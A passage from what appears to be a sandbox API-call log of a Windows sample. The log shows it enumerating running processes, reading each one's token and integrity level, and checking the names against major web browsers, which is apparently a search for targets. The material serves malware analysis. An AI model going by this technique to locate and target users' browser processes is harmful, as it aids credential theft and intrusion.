ReturnLength=0x4bfd0c) returned 0 [0245.517] GetLastError () returned 0x7a [0245.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.517] CloseHandle (hObject=0xb8) returned 1 [0245.517] CloseHandle (hObject=0xb4) returned 1 [0245.517] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.517] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.517] GetLastError () returned 0x7a [0245.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.517] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.518] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.518] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0245.518] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0245.518] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.518] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.518] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.518] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0245.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0245.518] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.518] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.518] GetLastError () returned 0x7a [0245.518] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.518] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.518] CloseHandle (hObject=0xb8) returned 1 [0245.518] CloseHandle (hObject=0xb4) returned 1 [0245.518] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.518] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.518] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.518] GetLastError () returned 0x7a [0245.518] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.519] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.519] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.519] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0245.519] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0245.519] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0245.519] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0245.519] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0245.519] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0245.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0245.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0245.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0245.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0245.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0245.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0245.519] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.519] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.519] GetLastError () returned 0x7a [0245.519] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.519] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.519] CloseHandle (hObject=0xb8) returned 1 [0245.520] CloseHandle (hObject=0xb4) returned 1 [0245.520] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.520] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.520] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.520] GetLastError () returned 0x7a [0245.520] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.520] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.520] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.520] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0245.520] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0245.520] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0245.520] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0245.520] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0245.520] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0245.520] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.521] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0247.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbd58) returned 0xc0000004 [0247.533] VirtualAlloc (lpAddress=0x0, dwSize=0xcd58, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0247.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xcd58, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0247.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0247.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0247.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0247.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0247.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0247.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0247.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0247.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xbc [0247.537] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.537] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.538] GetLastError () returned 0x7a [0247.538] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.538] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.538] CloseHandle (hObject=0x114) returned 1 [0247.538] CloseHandle (hObject=0xbc) returned 1 [0247.538] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.538] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.539] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.539] GetLastError () returned 0x7a [0247.539] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.539] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.539] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.539] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0247.539] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0247.539] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0247.539] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0247.540] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0247.540] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0247.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xbc [0247.540] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.540] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.540] GetLastError () returned 0x7a [0247.540] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.540] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.541] CloseHandle (hObject=0x114) returned 1 [0247.541] CloseHandle (hObject=0xbc) returned 1 [0247.541] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.541] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.541] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.541] GetLastError () returned 0x7a [0247.541] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.541] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.542] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.542] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0247.542] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0247.542] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0247.542] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0247.542] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0247.542] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0247.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xbc [0247.542] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.542] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.543] GetLastError () returned 0x7a [0247.543] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.543] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.543] CloseHandle (hObject=0x114) returned 1 [0247.543] CloseHandle (hObject=0xbc) returned 1 [0247.543] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.543] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.544] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.544] GetLastError () returned 0x7a [0247.544] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.544] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.544] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.544] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0247.544] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0247.544] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0247.544] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0247.545] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0247.545] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0247.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0247.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0247.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xbc [0247.545] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.545] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.545] GetLastError () returned 0x7a [0247.545] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.546] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.546] CloseHandle (hObject=0x114) returned 1 [0247.546] CloseHandle (hObject=0xbc) returned 1 [0247.546] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.546] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.546] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.546] GetLastError () returned 0x7a [0247.546] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.547] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.547] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.547] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.547] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.547] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0247.547] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.547] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.547] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0247.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xbc [0247.548] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0247.548] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0247.548] GetLastError () returned 0x7a [0247.548] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0247.548] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0247.548] CloseHandle (hObject=0x114) returned 1 [0247.548] CloseHandle (hObject=0xbc) returned 1 [0247.548] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0247.549] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0247.549] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0247.549] GetLastError () returned 0x7a [0247.549] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0247.549] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0247.549] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0247.549] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0247.549] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0247.550] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0247.550] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0247.550] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0247.550] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0247.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xbc [0247.550] 